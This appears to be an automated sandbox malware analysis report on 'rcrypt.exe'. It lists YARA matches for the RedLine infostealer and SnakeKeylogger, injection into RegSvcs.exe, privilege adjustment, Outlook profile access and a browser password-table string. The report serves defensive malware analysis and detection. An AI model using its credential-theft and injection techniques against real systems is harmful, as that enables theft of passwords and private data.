Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053B7CB8	2_2_053B7CB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BE488	2_2_053BE488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053B0C80	2_2_053B0C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BE8E0	2_2_053BE8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BE8D0	2_2_053BE8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053B7CC8	2_2_053B7CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BD328	2_2_053BD328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BD319	2_2_053BD319
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053B1378	2_2_053B1378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BD770	2_2_053BD770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BD780	2_2_053BD780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BDBD8	2_2_053BDBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BDBC8	2_2_053BDBC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BFA30	2_2_053BFA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BC620	2_2_053BC620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BC610	2_2_053BC610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BCA78	2_2_053BCA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053B1A78	2_2_053B1A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053B8670	2_2_053B8670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BCA68	2_2_053BCA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BFA40	2_2_053BFA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BCED0	2_2_053BCED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BCEC3	2_2_053BCEC3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: String function: 000F7F41 appears 35 times
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: String function: 00110D27 appears 70 times
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: String function: 00118B40 appears 42 times

Source: rcrypt.exe, 00000000.00000003.1316825682.000000000370D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs rcrypt.exe
Source: rcrypt.exe, 00000000.00000002.1319524168.00000000033B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs rcrypt.exe
Source: rcrypt.exe, 00000000.00000003.1317132966.0000000003563000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs rcrypt.exe

Source: rcrypt.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.rcrypt.exe.33b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.RegSvcs.exe.2a79a56.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2a79a56.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2a79a56.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2e60000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2e60000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2e60000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2a79a56.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2a79a56.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2a79a56.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2b60000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2b60000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2b60000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2b60ee8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2b60ee8.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2b60ee8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2b60000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2b60000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2b60000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2a7a93e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2a7a93e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2a7a93e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.1319524168.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.3769801925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: RegSvcs.exe PID: 7692, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, K-k.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/4@5/4

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_0015A2D5 GetLastError,FormatMessageW,

0_2_0015A2D5

Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00148713 AdjustTokenPrivileges,CloseHandle,		0_2_00148713
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00148CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00148CC3

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_0015B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0015B59E

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_0016F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0016F121

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_0015C602 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0015C602

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_000F4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_000F4FE9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\rcrypt.exe

File created: C:\Users\user\AppData\Local\Temp\aut63AD.tmp

Jump to behavior

Source: rcrypt.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\rcrypt.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000002.00000002.3772899142.0000000003243000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000003292000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000003252000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000003285000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000003261000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: rcrypt.exe

ReversingLabs: Detection: 76%

Source: unknown	Process created: C:\Users\user\Desktop\rcrypt.exe "C:\Users\user\Desktop\rcrypt.exe"
Source: C:\Users\user\Desktop\rcrypt.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\rcrypt.exe"
Source: C:\Users\user\Desktop\rcrypt.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\rcrypt.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rcrypt.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rcrypt.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rcrypt.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\rcrypt.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\rcrypt.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\rcrypt.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rcrypt.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\rcrypt.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rcrypt.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: rcrypt.exe

Static file information: File size 1155072 > 1048576

Source: rcrypt.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: rcrypt.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: rcrypt.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: rcrypt.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: rcrypt.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: rcrypt.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: rcrypt.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: rcrypt.exe, 00000000.00000003.1316634913.0000000003440000.00000004.00001000.00020000.00000000.sdmp, rcrypt.exe, 00000000.00000003.1315742393.0000000003590000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: rcrypt.exe, 00000000.00000003.1316634913.0000000003440000.00000004.00001000.00020000.00000000.sdmp, rcrypt.exe, 00000000.00000003.1315742393.0000000003590000.00000004.00001000.00020000.00000000.sdmp

Source: rcrypt.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: rcrypt.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: rcrypt.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: rcrypt.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: rcrypt.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: C:\Users\user\Desktop\rcrypt.exe

